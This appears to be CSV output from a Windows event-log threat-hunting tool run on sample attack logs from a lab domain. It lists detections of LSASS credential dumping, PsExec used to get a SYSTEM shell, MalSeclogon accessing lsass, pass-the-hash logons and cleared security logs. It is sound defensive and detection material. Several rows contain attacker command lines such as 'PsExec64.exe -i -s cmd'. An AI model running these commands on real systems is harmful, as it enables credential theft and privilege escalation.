2021-12-05 06:10:40.723 +09:00,fs03vuln.offsec.lan,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-LSASS credentials dump via Task Manager.evtx
2021-12-05 06:10:40.723 +09:00,fs03vuln.offsec.lan,11,high,CredAccess,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-LSASS credentials dump via Task Manager.evtx
2021-12-05 06:19:16.741 +09:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1035,technique_name=Service Execution | Cmd: PsExec64.exe -i -s cmd | Process: C:\TOOLS\PsExec64.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x83ef56 | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000 | Hash: SHA1=FB0A150601470195C47B4E8D87FCB3F50292BEB2,MD5=9321C107D1F7E336CDA550A2BF049108,SHA256=AD6B98C01EE849874E4B4502C3D7853196F6044240D3271E4AB3FC6E3C08E9A4,IMPHASH=159D56D406180A332FBC99290F30700E",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.757 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1035,technique_name=Service Execution | SetValue: HKU\S-1-5-21-4230534742-2542757381-3142984815-1111\Software\Sysinternals\PsExec\EulaAccepted: DWORD (0x00000001) | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.757 +09:00,fs03vuln.offsec.lan,11,info,,File Created,Path: C:\Windows\PSEXESVC.exe | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000,rules/hayabusa/sysmon/events/11_FileCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.757 +09:00,fs03vuln.offsec.lan,13,low,ResDev,Usage of Sysinternals Tools,,rules/sigma/registry_event/registry_event_sysinternals_eula_accepted.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.757 +09:00,fs03vuln.offsec.lan,11,low,Exec,PsExec Tool Execution,,rules/sigma/file_event/file_event_tool_psexec.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.804 +09:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.804 +09:00,fs03vuln.offsec.lan,17,low,Exec,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC | Process: System | PID: 4 | PGUID: A57649D1-92D1-61A4-EB03-000000000000",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdin | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdout | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stderr | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,18,low,Exec,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.929 +09:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: ""cmd"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\PSEXESVC.exe | LID: 0x3e7 | PID: 540 | PGUID: A57649D1-DB54-61AB-0467-DC0100000000 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.929 +09:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdin | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.929 +09:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdout | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.929 +09:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stderr | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:17.757 +09:00,fs03vuln.offsec.lan,22,info,,DNS Query,Query: fs03vuln | Result: 10.23.42.38; | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000,rules/hayabusa/sysmon/events/22_DNS-Query.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 07:09:13.666 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x10e6e8ef8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx
2021-12-05 07:09:13.671 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x10e6e8f26,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx
2021-12-05 07:09:13.672 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x10e6e8f3e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx
2021-12-05 07:09:13.673 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x10e6e8f54,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx
2021-12-05 07:09:18.652 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 0x10e6e929b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx
2021-12-08 02:33:01.409 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: MalSeclogon.exe -p 636 -d 2 | Process: \\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x53ca2 | PID: 8612 | PGUID: 747F3D96-9ACD-61AF-D301-000000000102",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
2021-12-08 02:33:01.474 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: - | LID: 0x3e7 | PID: 7108 | PGUID: 747F3D96-9ACD-61AF-D401-000000000102,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
2021-12-08 02:33:01.485 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\svchost.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: NT AUTHORITY\NETWORK SERVICE | Tgt User: NT AUTHORITY\SYSTEM | Access: 0x100000 | Src PID: 884 | Src PGUID: 747F3D96-0BA4-61B0-1200-000000000102 | Tgt PID: 7108 | Tgt PGUID: 747F3D96-9ACD-61AF-D401-000000000102,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
2021-12-08 02:33:01.616 +09:00,MSEDGEWIN10,4624,info,,Logon Type 9 - NewCredentials,User: IEUser | Computer: - | IP Addr: ::1 | LID: 0x16e3db3 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
2021-12-08 02:33:01.616 +09:00,MSEDGEWIN10,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
2021-12-08 02:33:01.616 +09:00,MSEDGEWIN10,4624,high,LatMov,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
2021-12-08 02:33:01.636 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: MalSeclogon.exe -p 636 -d 2 -l 1 | Process: \\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: - | LID: 0x16e3db3 | PID: 6072 | PGUID: 747F3D96-9ACD-61AF-D501-000000000102,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
2021-12-08 02:33:01.638 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: Z:\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | Tgt Process: Z:\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | Src User: MSEDGEWIN10\IEUser | Tgt User: MSEDGEWIN10\IEUser | Access: 0x100000 | Src PID: 8612 | Src PGUID: 747F3D96-9ACD-61AF-D301-000000000102 | Tgt PID: 6072 | Tgt PGUID: 747F3D96-9ACD-61AF-D501-000000000102,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
2021-12-08 02:33:01.680 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: Z:\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: MSEDGEWIN10\IEUser | Tgt User: NT AUTHORITY\SYSTEM | Access: 0x1410 | Src PID: 6072 | Src PGUID: 747F3D96-9ACD-61AF-D501-000000000102 | Tgt PID: 5268 | Tgt PGUID: 747F3D96-9ACD-61AF-D701-000000000102,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
2021-12-08 02:33:01.680 +09:00,MSEDGEWIN10,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
2021-12-08 02:33:01.680 +09:00,MSEDGEWIN10,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
2021-12-09 22:41:50.714 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: hack1,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4624-RottenPotatoNG.evtx"
2021-12-10 03:50:47.980 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
2021-12-10 03:50:55.333 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d4d5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d4ed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify 
registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d4fe,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d51f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d4d5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d4ed,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 
0x2a2d4fe,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d51f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d532,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:55.958 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:55.958 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:55.958 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High 
Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:56.005 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:56.052 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:56.052 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2f10a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:56.052 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2f10a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:56.099 +09:00,FS03.offsec.lan,4673,medium,CredAccess | 
Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:56.146 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:51:16.683 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x9e8 | User: FS03$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-12 16:15:28.352 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: hack1,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.716 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: | IP Addr: 10.23.123.11 | LID: 0x8723c7c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service 
Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx 2021-12-12 16:15:56.716 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: | IP Addr: 10.23.123.11 | LID: 0x8723c7c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx 2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx 2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8723c99,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 
